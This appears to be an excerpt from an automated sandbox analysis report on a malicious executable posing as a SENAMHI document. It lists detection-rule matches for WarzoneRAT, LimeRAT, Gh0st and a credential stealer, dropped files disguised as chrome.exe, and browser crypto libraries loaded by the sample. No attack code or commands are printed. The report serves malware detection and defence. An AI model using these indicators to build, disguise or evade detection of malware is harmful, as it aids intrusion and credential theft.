Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 19.0.chrome.exe.a20000.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 1.2.DocumentoSENAMHI20222103.exe.2ff89af.3.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 1.2.DocumentoSENAMHI20222103.exe.2ff89af.3.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 18.3.chrome.exe.3e8812f.1.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 15.2.wtqsCpda..exe.2b22c9c.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 15.2.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 18.2.chrome.exe.53f0000.7.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.3.chrome.exe.3e81c45.2.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.2.chrome.exe.53d0000.1.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000001.00000002.83503482474.00000000014EF000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPED Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe, type: DROPPED Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe, type: DROPPED Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: String function: 00BD4730 appears 34 times
Sample file is different than original file name gathered from version info
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81070018910.0000000005E26000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80844565838.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80842292045.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81070163110.0000000005E58000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81069901900.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83512915307.0000000005613000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameuser32j% vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80845816715.0000000005E59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83509823788.000000000515F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameuser32j% vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81073154674.0000000005E59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83518836187.0000000006410000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83508026711.00000000047E2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMultiRead.EXEB vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81066835085.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80842539174.0000000005E58000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000000.78446193953.0000000000D13000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameMultiRead.EXEB vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83515401149.0000000005E58000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80837083048.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81066992882.0000000005E18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81037251638.0000000005E58000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81072098650.0000000005E58000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81035574767.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80756890980.0000000006411000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80741387008.0000000006411000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80765987792.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80760169574.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80768273960.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81037950651.0000000005E59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80844749588.0000000005E58000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe Binary or memory string: OriginalFilenameMultiRead.EXEB vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wtqsCpda..exe.log
Source: classification engine Classification label: mal100.troj.expl.evad.winEXE@10/16@1/2
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe File read: C:\Users\user\Desktop\desktop.ini
Source: 15.2.wtqsCpda..exe.540000.0.unpack, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 15.2.wtqsCpda..exe.540000.0.unpack, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 19.2.chrome.exe.a20000.0.unpack, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 19.2.chrome.exe.a20000.0.unpack, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 15.0.wtqsCpda..exe.540000.1.unpack, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 15.0.wtqsCpda..exe.540000.1.unpack, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 18.0.chrome.exe.760000.0.unpack, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 18.0.chrome.exe.760000.0.unpack, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: chrome.exe.15.dr, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: chrome.exe.15.dr, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 19.0.chrome.exe.a20000.2.unpack, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 19.0.chrome.exe.a20000.2.unpack, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Chrome[1].exe.1.dr, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: Chrome[1].exe.1.dr, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 15.0.wtqsCpda..exe.540000.2.unpack, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 15.0.wtqsCpda..exe.540000.2.unpack, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 18.2.chrome.exe.760000.0.unpack, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 18.2.chrome.exe.760000.0.unpack, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 19.0.chrome.exe.a20000.1.unpack, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 19.0.chrome.exe.a20000.1.unpack, ??????/??????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 15.0.wtqsCpda..exe.540000.0.unpack, ??????/??????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
